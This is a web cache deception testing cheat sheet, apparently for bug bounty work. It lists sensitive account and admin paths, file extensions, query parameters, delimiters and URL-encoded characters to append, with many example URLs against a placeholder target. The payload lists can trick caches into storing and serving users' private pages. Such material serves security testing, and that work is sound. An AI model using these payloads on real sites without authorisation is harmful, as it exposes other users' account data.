Identifying Cacheable Endpoints
When looking for web cache deception bugs, some endpoints are more likely to be vulnerable. Start by checking these common sensitive paths first:

/account
/profile
/dashboard
/settings
/user
/admin
/private
/my-account
/user/profile
/dashboard/image
/dashboard/profile
/account/user
/address
/account/settings
/profile/edit
/user/settings
/admin/panel
/private/files
/my-account/orders
/user/details
/dashboard/reports
/account/profile
/account/info
/profile/view
/admin/settings
/private/data
/my-account/settings
/user/account

These paths typically contain user-specific information and are prime targets for cache deception attacks.


File Extensions to Test
When testing for cache deception, append various file extensions to sensitive endpoints to make them appear as static resources:

.css
.js
.svg
.asp
.aspx
.atom
.bak
.bin
.cgi
.csv
.do
.eot
.exe
.fake.js
.gif
.html
.ico
.jpg
.jpeg
.json
.jsp
.mp3
.mp4
.old
.pdf
.php
.png
.rss
.tar.gz
.tmp
.ttf
.txt
.webm
.woff
.woff2
.xml
.zip
.7z

Add the above extensions to dynamic endpoints, for example:

/dashboard.png
/user.js
/admin.css
/orders.jpg

# Try fake directories:
 /admin.css/login
 /account.js/test
 /settings/fake.js
 /orders/test/style.css


Injecting Cache Keys with Query Parameters
Many CDNs cache based on certain query parameters. Attackers can exploit this by crafting URLs with such parameters to trick caches into storing and serving sensitive data.

.js?test=123
.css?test=123
.jpeg?test=123
.jpg?test=123
.png?test=123
.gif?test=123
.woff?test=123
.woff2?test=123
.ttf?test=123
.otf?test=123
.svg?test=123
.html?test=123
.xml?test=123
.json?test=123
.mp4?test=123
.webm?test=123
.ico?test=123
.txt?test=123
.pdf?test=123
.doc?test=123
.xls?test=123
.ppt?test=123
.mp3?test=123
.ogg?test=123
.wav?test=123
.csv?test=123
.swf?test=123
.zip?test=123
.tar?test=123
.gz?test=123
.bz2?test=123
.7z?test=123
.webp?test=123
.bmp?test=123
.mpg?test=123
.avi?test=123
.mkv?test=123
.flv?test=123
.wmv?test=123
.ogg?test=123
.weba?test=123
.srt?test=123
.vtt?test=123
.rss?test=123
.atom?test=123
.webmanifest?test=123
.appcache?test=123
.ico?test=123
.jsonld?test=123
.webmanifest?test=123
.manifest?test=123
.yaml?test=123
.log?test=123
.jar?test=123
.webloc?test=123
.plist?test=123
.mpg2?test=123
.mk3d?test=123
.webm?test=123
.shtml?test=123
.xhtml?test=123
.phtml?test=123
.jsp?test=123
.aspx?test=123
.slim?test=123
.md?test=123
.txt?test=123
.woff?test=123
.woff2?test=123
.json?test=123
.map?test=123
.yml?test=123
.yaml?test=123

Examples:
https://target.com/account?file=main.js  
https://target.com/settings?theme=dark.css  
https://target.com/user?resource=profile.jpg  
https://target.com/admin?view=dashboard.png  
https://target.com/api?callback=static.js
https://target.com/profile.js?test=123  
https://target.com/account.css?test=123  
https://target.com/settings.jpeg?test=123  
https://target.com/dashboard.jpg?test=123


Delimiters and Special Characters
Use these delimiters and special characters to creatively manipulate URLs and bypass cache rules.

~
\/
\
;
:
//
/
..
.
_
-
@
?
=
#
##
!*
!
&
$
%5c
%3d
%2f
%2e
%26
%23
%20
%0a
%09
%00

Examples:

https://target.com/account~style.css  
https://target.com/profile\/test.js  
https://target.com/settings\backup.jpg  
https://target.com/dashboard;v2.png  
https://target.com/user:data.css  
https://target.com/admin//panel.js  
https://target.com/private/../secret.css  
https://target.com/profile.edit.jpg  
https://target.com/user_name-test.gif  
https://target.com/account@cache.png  
https://target.com/profile?version=1.css  
https://target.com/settings=value.js  
https://target.com/dashboard#section.css  
https://target.com/user##details.js  
https://target.com/admin!*test.jpg  
https://target.com/private!cache.gif  
https://target.com/profile&token=123.css  
https://target.com/account$hidden.js  
https://target.com/settings%5cencoded.jpg  
https://target.com/dashboard%3dversion.css  
https://target.com/user%2ffile.js  
https://target.com/admin%2eedit.png  
https://target.com/private%26data.css  
https://target.com/profile%23hash.js  
https://target.com/account%20space.jpg  
https://target.com/settings%0anewline.css  
https://target.com/dashboard%09tab.js  
https://target.com/user%00nullbyte.png


Encoded Delimiter Testing
Use URL-encoded special characters before file extensions to bypass cache rules and uncover hidden caching issues.

%60.js?test=123
%60.css?test=123
%60.jpeg?test=123
%60.jpg?test=123
%60.png?test=123
%60.gif?test=123
%60.woff?test=123
%60.woff2?test=123
%60.ttf?test=123
%60.otf?test=123
%60.svg?test=123
%60.html?test=123
%60.xml?test=123
%60.json?test=123
%60.mp4?test=123
%60.webm?test=123
%60.ico?test=123
%60.txt?test=123
%60.pdf?test=123
%60.doc?test=123
%60.xls?test=123
%60.ppt?test=123
%60.mp3?test=123
%60.ogg?test=123
%60.wav?test=123
%60.csv?test=123
%60.swf?test=123
%60.zip?test=123
%60.tar?test=123
%60.gz?test=123
%60.bz2?test=123
%60.7z?test=123
%60.webp?test=123
%60.bmp?test=123
%60.mpg?test=123
%60.avi?test=123
%60.mkv?test=123
%60.flv?test=123
%60.wmv?test=123
%60.ogg?test=123
%60.weba?test=123
%60.srt?test=123
%60.vtt?test=123
%60.rss?test=123
%60.atom?test=123
%60.webmanifest?test=123
%60.appcache?test=123
%60.ico?test=123
%60.jsonld?test=123
%60.webmanifest?test=123
%60.manifest?test=123
%60.yaml?test=123
%60.log?test=123
%60.jar?test=123
%60.webloc?test=123
%60.plist?test=123
%60.mpg2?test=123
%60.mk3d?test=123
%60.webm?test=123
%60.shtml?test=123
%60.xhtml?test=123
%60.phtml?test=123
%60.jsp?test=123
%60.aspx?test=123
%60.slim?test=123
%60.md?test=123
%60.txt?test=123
%60.woff?test=123
%60.woff2?test=123
%60.json?test=123
%60.map?test=123
%60.yml?test=123
%60.yaml?test=123